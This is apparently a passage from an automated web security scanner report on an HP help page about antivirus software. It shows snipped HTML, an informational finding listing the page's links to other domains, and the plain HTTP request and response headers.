...[SNIP]...
<td><img src="http://welcome.hp-ww.com/img/s.gif" width="1" height="20" alt=""></td>
...[SNIP]...
<td align="left" width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="10" alt=""></td>
...[SNIP]...
<td align="left" valign="top" width="560" class="colorCCCCCCbg"><img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="1" alt=""></td>
...[SNIP]...
<td align="left" width="560"><img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="10" alt=""></td>
...[SNIP]...
<td align="left" width="10"><img src="http://welcome.hp-ww.com/img/s.gif" width="10" height="1" alt=""></td>
...[SNIP]...
<div class="textLevelC">
<img src="http://welcome.hp-ww.com/img/s.gif" width="560" height="10" alt="">

<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/cma/segment/ww/aquarius/metricsauq.js"></script>
...[SNIP]...

9.17. http://h71036.www7.hp.com/hho/cache/386481-0-0-225-121.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://h71036.www7.hp.com
Path:	/hho/cache/386481-0-0-225-121.html

Issue detail

The page was loaded from a URL containing a query string:

http://h71036.www7.hp.com/hho/cache/386481-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-all_about_9370/

The response contains the following links to other domains:

http://welcome.hp-ww.com/cma/segment/ww/aquarius/metricsauq.js
http://welcome.hp-ww.com/country/js/hpweb_syn_con.js
http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js
http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css
http://welcome.hp-ww.com/country/us/en/styles/hpweb_print.css
http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif
http://welcome.hp-ww.com/js/hpweb_soctag.js
http://www.microsoft.com/windows/windows-7/

Request

GET /hho/cache/386481-0-0-225-121.html?jumpid=re_r10104_us/en/hho/psg/promoindex-ot-xx-pu-pc_offers_and_solutions/chev-all_about_9370/ HTTP/1.1
Host: h71036.www7.hp.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Length: 24919
Content-Type: text/html
Last-Modified: Thu, 17 Feb 2011 17:23:56 GMT
Accept-Ranges: bytes
ETag: "27ccbc74c7cecb1:268"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Thu, 30 Jun 2011 11:50:20 GMT
Connection: close

...<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en-US">
<head>
   <title>Using antivirus software</title>
   <meta http-equiv="Con
...[SNIP]...

   <link rel="stylesheet" type="text/css" href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_eeeep_ov2.css">
<SCRIPT LANGUAGE="JavaScript">
...[SNIP]...
</script>

   <script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/country/us/en/js/hpweb_utilities.js"></script>
<script language="JavaScript" type="text/javascript" src="http://welcome.hp-ww.com/country/js/hpweb_syn_con.js"></script>

   
   <link rel="stylesheet" type="text/css" media="print" href="http://welcome.hp-ww.com/country/us/en/styles/hpweb_print.css">

<script language="JavaScript" type="text/javascript" src="http://www.hp.com/united-states/consumer/digital_photography/hho_prod_cart.js">
...[SNIP]...


<script type="text/javascript" language="JavaScript" src="http://welcome.hp-ww.com/js/hpweb_soctag.js"></script>
...[SNIP]...
<a href="http://welcome.hp.com/country/us/en/welcome.html" title="HP.com home"><img src="http://welcome.hp-ww.com/img/hpweb_1-2_topnav_hp_logo.gif" width="64" height="55" alt="" border="0"><span class="screenReading">
...[SNIP]...
gin-left:200px">
Systems may require upgraded and/or separately purchased hardware to take full advantage of Windows. 7 functi